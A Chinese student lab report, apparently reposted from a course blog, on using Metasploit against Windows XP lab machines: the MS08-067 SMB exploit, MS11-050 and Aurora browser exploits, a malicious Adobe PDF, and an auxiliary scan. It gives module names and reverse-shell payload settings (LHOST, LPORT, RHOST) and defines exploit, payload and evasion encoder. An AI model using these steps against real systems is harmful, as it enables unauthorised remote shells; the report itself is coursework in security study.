码迷,mamicode.com
首页 > 其他好文 > 详细

20155330 《网络对抗》 Exp5 MSF基础应用

时间:2018-04-29 01:20:25      阅读:258      评论:0      收藏:0      [点我收藏+]

标签:文件   res   加载   file   htm   info   PDF文档   pre   就是   

20155330 《网络对抗》 Exp5 MSF基础应用

实践过程记录

Windows服务渗透:MS08_067漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.132
  • 靶机:windows XP SP3 简体中文
    • IP地址:192.168.124.135
  • 输入命令use exploit/windows/smb/ms08_067_netapi
  • 设置参数

    set payload generic/shell_reverse_tcptcp反向回连
    set LHOST 192.168.23.130 此IP是kali的IP
    set LPORT 5321 端口
    set RHOST 192.168.23.142 此IP是靶机WIN XP的IP,特定漏洞端口已经固定
    set target 0
  • 并进行攻击exploit
    技术分享图片
  • 结果失败了。
    技术分享图片
  • 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。
    技术分享图片
  • 成功了,使用systeminfo查看靶机信息。
    技术分享图片

    浏览器:MS11-050漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.132
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • use windows/browser/ms11_050_mshtml_cobjectelement使用该模块
  • 加载payloadset payload windows/meterpreter/reverese_http,并设置相应参数,打开服务exploit,发起渗透攻击。
    技术分享图片
  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/ms5330
    技术分享图片
  • 但是在kali攻击机中一直出错,回连没有成功。
  • 然后参考组长的博客,将攻击的目标漏洞换成了MS10_002_aurora

    浏览器:MS10_002_aurora漏洞攻击

  • 攻击机:kali
    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3(English)
    • IP地址:192.168.124.136
  • 输入下图中的命令并执行攻击
    技术分享图片
  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/aurora.html
    技术分享图片
  • 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。
    技术分享图片
  • 第二次生成了不同的网址
    技术分享图片
  • 回连成功后使用sysinfo查看靶机信息
    技术分享图片
  • 靶机ip地址
    技术分享图片

    Adobe渗透测试

  • 攻击机:kali
    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • 进入windows/fileformat/adobe_cooltype_sing模块设定相关系数并生成相关文件5330.pdf
    技术分享图片
  • 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。
    技术分享图片
  • 在靶机中关闭PDF文档后,攻击机与靶机断开连接。
    技术分享图片

    辅助模块

  • 输入命令show auxiliary查看所有辅助模块
    技术分享图片
  • 选中其中一个模块进入
    技术分享图片
  • show options查看需要设置的消息,并设置必要参数
    技术分享图片
  • 使用命令run开启扫描,结果如下:
    技术分享图片

实验后回答问题

  • exploit
    • 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
  • payload
    • 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
  • encode
    • 编码器。修改字符达到“免杀”目的。

实验感受

这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。

20155330 《网络对抗》 Exp5 MSF基础应用

标签:文件   res   加载   file   htm   info   PDF文档   pre   就是   

原文地址:https://www.cnblogs.com/ashin-kl/p/8970059.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!